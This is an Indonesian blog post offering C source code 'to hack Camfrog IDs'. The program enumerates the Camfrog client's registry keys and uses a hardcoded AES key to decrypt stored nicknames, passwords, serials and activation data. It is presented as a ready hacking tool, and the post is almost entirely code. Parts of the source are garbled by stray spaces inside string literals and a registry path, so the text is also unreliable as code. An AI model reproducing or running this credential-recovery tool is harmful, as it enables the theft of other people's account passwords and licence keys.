neh source code buat hack ID camfrog
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <openssl/aes.h>
typedef uint8_t u8;
#ifdef WIN32
#include <windows.h>
int camfrog_enum(void);
#endif
#define VER "0.2"
#define BUFFSZ 2049
#define KEYPATH "Software\\Camfrog\\Client"
#define CLSIDKEY "Software\\Microsoft\\Windows\\CurrentVersion\\Tel ephony"
u8 hex2byte(u8 *hex);
u8 *camfrog_pwd(u8 *pwd, u8 *clsid);
int main(int argc, char *argv[]) {
u8 *pwd,
*clsid = NULL;
setbuf(stdout, NULL);
fputs("\n"
"CamFrog passwords decrypter "VER"\n"
"by budhie73\n"
"e-mail: budhie73@gmail.com\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s [encoded_data] [PhDeviceCLSID]\n"
"\n"
" this tool can be used to decrypt any encrypted value located in the Camfrog\n"
" registry keys like Serial, ActivationData and any password\n"
"\n"
" PhDeviceCLSID is the value located in the following registry key:\n"
" HKCU\\Software\\Microsoft\\Windows\\CurrentVersion \\Telephony\\PhDeviceCLSID\n"
" this value is required if you want to decrypt a custom ActivationData key\n"
"\n", argv[0]);
#ifdef WIN32
printf("- start registry scanning:\n\n");
if(!camfrog_enum()) {
printf("- no Serial, ActivationData or passwords found in the registry\n\n");
}
printf("Press RETURN to quit\n");
fgetc(stdin);
#else
exit(1);
#endif
} else {
pwd = strdup(argv[1]);
if(argc > 2) clsid = strdup(argv[2]);
printf(" decrypted data: %s\n", camfrog_pwd(pwd, clsid));
}
return(0);
}
#ifdef WIN32
int regkey(HKEY hKey, LPCTSTR lpSubKey, LPTSTR lpValueName, u8 *buff, int len) {
HKEY key;
buff[0] = 0;
if(RegOpenKeyEx(hKey, lpSubKey, 0, KEY_READ, &key) != ERROR_SUCCESS) {
return(-1);
}
if(RegQueryValueEx(key, lpValueName, NULL, NULL, buff, (void *)&len) != ERROR_SUCCESS) {
RegCloseKey(key);
return(-1);
}
RegCloseKey(key);
return(0);
}
int camfrog_enum(void) {
HKEY key;
int len,
k,
tot;
u8 regbuff[BUFFSZ],
clsidbuff[BUFFSZ],
buff[BUFFSZ],
*p;
tot = 0;
if(RegOpenKeyEx(HKEY_CURRENT_USER, KEYPATH, 0, KEY_READ, &key)) return(tot);
p = regbuff + sprintf(regbuff, "%s\\", KEYPATH);
for(k = 0; ; k++) {
len = BUFFSZ;
if(RegEnumKeyEx(key, k, p, (void *)&len, NULL, NULL, NULL, NULL)) break;
strcat(p, "\\ProfileInfo");
if(!regkey(HKEY_CURRENT_USER, regbuff, "ActivationData", buff, sizeof(buff))) {
if(!buff[0]) continue;
if(regkey(HKEY_CURRENT_USER, CLSIDKEY, "PhDeviceCLSID", clsidbuff, sizeof(clsidbuff)) < 0) {
printf("- ActivationData found but no PhDeviceCLSID, so I can't decrypt it\n");
continue;
}
printf(" ActivationData: %s\n\n", camfrog_pwd(buff, clsidbuff));
tot++;
}
if(!regkey(HKEY_CURRENT_USER, regbuff, "Serial", buff, sizeof(buff))) {
if(!buff[0]) continue;
printf(" Serial: %s\n\n", camfrog_pwd(buff, NULL));
tot++;
}
if(!regkey(HKEY_CURRENT_USER, regbuff, "Nickname", buff, sizeof(buff))) {
if(!buff[0]) continue;
printf(" nickname: %s\n", buff);
if(regkey(HKEY_CURRENT_USER, regbuff, "Password", buff, sizeof(buff)) < 0) continue;
printf(" password: %s\n\n", camfrog_pwd(buff, NULL));
tot++;
}
}
printf("- \"Nickname List\\Item\" scanning:\n\n");
for(k = 0; ; k++) {
sprintf(regbuff, "%d", k);
if(regkey(
HKEY_CURRENT_USER,
KEYPATH "\\CurrentVersion\\ProfileInfo\\Nickname List\\Item", regbuff,
buff, sizeof(buff)) < 0) break;
switch(k % 3) {
case 0: printf(" nickname: %s\n", buff); break;
case 1: printf(" password: %s\n", camfrog_pwd(buff, NULL)); break;
case 2: printf(" ??? %s\n\n", camfrog_pwd(buff, NULL)); break;
}
tot++;
}
RegCloseKey(key);
return(tot);
}
#endif
u8 hex2byte(u8 *hex) {
static const u8 hextable[256] =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x00\x00\ x00\x00\x00\x00"
"\x00\x0a\x0b\x0c\x0d\x0e\x0f\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x0a\x0b\x0c\x0d\x0e\x0f\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00";
return((hextable[hex[0]] << 4) | hextable[hex[1]]);
}
u8 *camfrog_pwd(u8 *pwd, u8 *clsid) {
AES_KEY aes_ctx;
int i,
pwdlen,
clsidlen;
static const u8 key[16] = "CamFrogMCU DLL01";
for(i = 0; pwd[i << 1]; i++) {
pwd[i] = hex2byte(pwd + (i << 1));
}
pwdlen = i;
if(clsid) {
for(i = 0; clsid[i << 1]; i++) {
clsid[i] = hex2byte(clsid + (i << 1));
}
clsidlen = i;
for(i = 0; i < pwdlen; i++) {
pwd[i] ^= clsid[i % clsidlen];
}
}
AES_set_decrypt_key(key, sizeof(key) << 3, &aes_ctx);
for(i = 0; i < pwdlen; i += 16) {
AES_decrypt(pwd + i, pwd + i, &aes_ctx);
}
pwd[i] = 0;
return(pwd);
}
Source : indonesianhacker
0 komentar:
Posting Komentar